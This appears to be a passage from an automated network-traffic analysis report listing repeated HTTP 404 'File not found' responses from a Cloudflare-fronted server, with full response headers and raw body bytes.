Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 02 Dec 2024 13:47:24 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2F4e6d2eBWYJinsC6QHsmO4P8tRyrnl9jgiOq4GB4JIb3bz1%2B6h8iOen3xxHo98Yd9wEZ3rJTFM3e0yc1%2FO%2BHAQ%2FNvsQ8QqCsftHal24GsX4NqJpAEEBE2Va5VDViE%2Fc5"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8ebbc4c76b0943a6-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1767&min_rtt=1767&rtt_var=883&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=407&delivery_rate=0&cwnd=177&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 02 Dec 2024 13:47:26 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=j55KK7ACqVuPP3I2gm448pO7l6UXPwZovrE1ZxYEkL4NeAjGfNxrvcx3ApwksYG6vXJOiWknxm6UleXeqg4E3l6Ad4BToi7YK4T6odCHY4CIkJNNIFoxEkSE6Sk0r7gt"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8ebbc4d18abc4283-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=2046&min_rtt=2046&rtt_var=1023&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=407&delivery_rate=0&cwnd=237&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 02 Dec 2024 13:47:28 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=sdyxGOyKiQFYLQl%2B0WqFtinamb19YU2CTQD9huf2JihXX4cgSe4ISRrf4TZIDBlCWrAboJIKvdVFGlbnk4U4VWxE3YCCHO2lZAWjKumJo8BnBorRWjuXaBvScQadN%2BFn"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8ebbc4dbddd90fab-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1626&min_rtt=1626&rtt_var=813&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=407&delivery_rate=0&cwnd=186&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 02 Dec 2024 13:47:29 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zyC6gr5AZD3T0IcC9FM8MJYxTKNHluPr43TqP9wLUGg1%2Bwx6UmHHGNcO0YNvEV7ZxYbjWO1bobzzUcTbBu%2FVokr0B7vGNU5qI3hZHXN%2FfLZzdld9ge%2BDClP2tmXIG4hH"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8ebbc4e649f642bf-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1692&min_rtt=1692&rtt_var=846&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=407&delivery_rate=0&cwnd=211&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 02 Dec 2024 13:47:31 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=pYPCZ9NN6k1M3q2VaboJl01pKoW2goM8QsxR7dqnFB%2BmMZeM%2BI5GA%2Bf5lHKLygLVb84bZ6rXqIFLww1CpPZ%2FNjDCNm2qXN%2F4DheYM4osC23L%2Fb9R0ASpcWGRv9xQxOah"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8ebbc4f0cbbf5e62-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1668&min_rtt=1668&rtt_var=834&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=407&delivery_rate=0&cwnd=143&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 02 Dec 2024 13:47:33 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wZoOv1074rXKiMYz6mxUfrBSQ6l3%2F81U6Xc2t7pqxid1ZdSXypMf0L2WmENWQrzw%2FO%2FFFvUeHKB6B7HYH3iMvUzAG6Aoeb1SWZW%2FkiW2Mfo3ZYY4F8t8nigBZDfvI35G"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8ebbc4fb6d494397-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1704&min_rtt=1704&rtt_var=852&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=407&delivery_rate=0&cwnd=65&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 02 Dec 2024 13:47:34 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cUaynUwbaCm5f%2FqWaYzyaIHBxhbDpppNqkqtNng2V%2BPbsYmoC7MjzuRWzam7xRPDe3tK%2F%2Bjx0gTIcNlNxFwymqzu4OiQSQp6kF6sepIk923%2BTd0LHTz%2BFdPIzJ6cI6ZY"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8ebbc505eea07cfa-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1859&min_rtt=1859&rtt_var=929&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=407&delivery_rate=0&cwnd=185&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 02 Dec 2024 13:47:36 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=KZMANK9j2Jj1ko%2BEIsWvqO7wI2FGF5ADkrksF8Qy0hoPLQT7%2F6ncbjZQlWycHLLHXj%2FcdMCz0kHcssmFp7LrKklfk4SMaHQZ3rHcRwFpERrIMxhv%2BqvuYzKFYH44wJjV"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8ebbc50fe89a8c8f-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=2017&min_rtt=2017&rtt_var=1008&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=407&delivery_rate=0&cwnd=202&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 02 Dec 2024 13:47:38 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2BExkprNWdD39oPQStu0%2FkqHSkiCZRsk4F5uj%2B9xSgcnoq8jQCigRqpbCnAq0Zct2MyZNqKYSm3e4RnzClUcwFqf3r2NycOuKhTwoJRwtHf5iNfvXjaj5BgsEJfl7W5gL"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8ebbc51a2a3542d0-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=2019&min_rtt=2019&rtt_var=1009&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=407&delivery_rate=0&cwnd=195&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 02 Dec 2024 13:47:39 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=nbxuXP6sF2ovyE%2FH0%2Fz4KHZmET73QdOerZgSO1jlWsjYKkwv3KkxCUUsvxSw9TU6d1W4GeOtO6JVUuQgJYZSWHwLxz%2FKlyhpmNxzn6tZgX3mLWPrWB%2Fsj6O8NnTINXuv"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8ebbc524cd0a4285-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=2511&min_rtt=2511&rtt_var=1255&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=407&delivery_rate=0&cwnd=30&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 02 Dec 2024 13:47:41 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BV7XE4x9aCyxYSkfUSfA9SkEX3Kn2zPYG5IA91eWKxuJJmXSvBykTuCynp8kniOJcf9M0Re68Q48u7qkpbSRo2pB7gOqve3UAcq3XkNKrxwxP1CLlrgItcVHKtjQhxr6"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8ebbc52fb817425d-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1554&min_rtt=1554&rtt_var=777&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=407&delivery_rate=0&cwnd=191&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 02 Dec 2024 13:47:43 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VZH1nqx2LxdOi383B9WDAG4NSaFPUsQoh2BbKj5HY%2Bz%2FVECl4tQlDC2IDXk6XXw0sorrlmPhJQc7cbYH%2BICXVVcoihCrGrRsKxEhgHz41upDfoYuzm4sncypYxSUGPmi"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8ebbc53a19968c9b-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1965&min_rtt=1965&rtt_var=982&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=407&delivery_rate=0&cwnd=168&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 02 Dec 2024 13:47:44 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=h7dpb41PqJe5xyMcAssTCKUI10JR5p6KkSkEWFaqb3wVu5qFYbJgFT01IkWsmq5xw6%2By%2B%2BK1ZCaJs%2FRycfbaq8bzc5sy%2BIDrxrgizxWJuryO5rYkUsJgcE%2Fs%2BuGGM5NC"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8ebbc5446df77cff-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1837&min_rtt=1837&rtt_var=918&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=407&delivery_rate=0&cwnd=213&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 02 Dec 2024 13:47:46 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=98IVuVhPRSO4pDwJei3JLcvE5EMZZkKucwS1fR11DWn0cj8v8fkS8hLHiQe0TP1J32RyB9cFBig8Le3T1W9SIGS7groQ%2F4qYPZuYR1XkEzZjPS3Pd1iSlsJEPPuEaCJm"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8ebbc5500fe5426d-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1592&min_rtt=1592&rtt_var=796&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=407&delivery_rate=0&cwnd=220&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 02 Dec 2024 13:47:48 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=sgbwDOHpb1P12%2FSKQn8BXUMOGZBPakQx0Ao7nepmIZKl2c4AF6JDHtMw9s2vF1%2B0T1Fu1KrVqFYcs0YHUsH4wo%2FnPoEeVEo9VRBypQj%2BsX9P1ksgRjVSJRT%2BA05IYxPq"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8ebbc55a2f034362-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1755&min_rtt=1755&rtt_var=877&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=407&delivery_rate=0&cwnd=248&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 02 Dec 2024 13:47:50 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VnLtwEg3w3p5CmG%2BnCUgJ8Eo3gFcjI8jvsOxbl1bgQc6DF2tfaDlt%2BEZtWOCYqJzBySjLhpNM0UBM5aUpgwcmURZeSvRLSkNQUyzke%2Fl%2BpgEc0aDDiv1qUMKcjIAi50J"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8ebbc564fe0e4210-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1594&min_rtt=1594&rtt_var=797&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=407&delivery_rate=0&cwnd=242&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 02 Dec 2024 13:47:51 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=pIm1LaUYkIjXL%2BMdNx7fsQh5YgP1lYdDV%2F9Tnz4ZHv8WOO5%2BtBPYTdyqTLG9OjUIVOW5VTQUGYk0cbYKfiWt7ClZr6%2BciLr4fCKMNeAKGp0aZUApBuGJbvMvqwX35ukU"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8ebbc56f2c2f42e5-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1720&min_rtt=1720&rtt_var=860&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=407&delivery_rate=0&cwnd=216&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 02 Dec 2024 13:47:53 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1kxNrVRcbxTI4Yh5P1o%2B%2BALeZNIxADr%2FeIkSdP%2FJhS7RsFeMXLivoRtKxstUxhstJBxcwjWEP33BJMcYFpa1EfLlTluKvF9qzcmyUdNqz5vbKQCzXRN4J7lAgdbUDNC7"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8ebbc5790afc7c99-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1942&min_rtt=1942&rtt_var=971&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=407&delivery_rate=0&cwnd=227&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 02 Dec 2024 13:47:54 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=yLahBiXtdqt6AeRCrBYcipcm7rTL6vP%2Fx1q2SEwm05%2BK%2BIC6mEb34af6mZkpsuVIRmo9vratTstHnNJ9Un34Ld8BZLdkd0zTPhPq1IOnPfmyxMNwrgCUtN9ayg3Am4vZ"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8ebbc582eeb243c8-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1784&min_rtt=1784&rtt_var=892&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=407&delivery_rate=0&cwnd=189&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 02 Dec 2024 13:47:56 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=O5flaIV4cS%2FkDj1zC7XiGC2CnQ3L%2FhxDQuSnzdmpYrHmiO%2FnZPThl6AsZryhlpfASoakD7RhRwGNYykt87N8Ac4%2B%2BGYnuGqhOfasRuuHviSDRn1zuh5INnKAs5ndIPNH"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8ebbc58caa0c42e9-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1562&min_rtt=1562&rtt_var=781&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=407&delivery_rate=0&cwnd=232&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 02 Dec 2024 13:47:58 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vAR8oqtfoMNQNJXrOdgu5kWdPEw94QtCdsU0AjTX7ObIrtP4pk7zHxrTR8iy4bTFQsBuxSdiNvHiM%2F0jpMtowMdLSoq1dfU2lyAsV702QQhzslxa9XqDuG9kuD8NKTyq"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8ebbc597acb2436d-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1649&min_rtt=1649&rtt_var=824&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=407&delivery_rate=0&cwnd=157&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 02 Dec 2024 13:47:59 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BYRg%2BTAeOQgVX7PPjeYASUpiOROI3VZ20%2F4JP2txUvK6uyQdlHsLr3cieuevwgfcxJUKyIYZ6pKJZ0lzHZjqeH2C7iKA%2FPhoANX%2Fmt4kUpntDOoYEi1ypakgLLPpKoht"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8ebbc5a2284243df-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1699&min_rtt=1699&rtt_var=849&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=407&delivery_rate=0&cwnd=241&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 02 Dec 2024 13:48:01 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xTWtTogKq9x3b74%2B%2FdkfEkfR5Gjs1wYXadZm8ypPJOugZKbI7ufzyPL%2BD4WFssnVOTskO%2F%2BjLb6uj%2F8YAwU6qq4mFkeEhp9849QI5Z2eYvOFgBCZuHYYRdrUjtuF5Py2"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8ebbc5ac6c931835-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1716&min_rtt=1716&rtt_var=858&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=407&delivery_rate=0&cwnd=137&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 02 Dec 2024 13:48:04 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fMeyClhoeuRYpNgGk%2FCTIgJ2OynvuGIr65osAXKblMCrlkyZeoxdiYu5TTufL07XRAeMqEEz%2BPRTlHXn4QNvYZFvl0lvIuoMIcWy%2FJWThJCaklMZUBwBEuZ7f8eq0J2H"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8ebbc5b7183c9e08-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=5398&min_rtt=5398&rtt_var=2699&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=407&delivery_rate=0&cwnd=161&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 02 Dec 2024 13:48:06 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8crs%2FiVJZoV9N%2BFGtoKx%2FJE69Zv9B3hKDywXYXjR61BOZY2oo5VoGq0aaWTgwm7p8eAixx5oJgsmfs5172sg5%2BfKRLecWuuIu2uMjhUxPoFXMxQIzfAABaFUk0dtboUQ"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8ebbc5c94b1b1869-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1610&min_rtt=1610&rtt_var=805&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=407&delivery_rate=0&cwnd=230&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
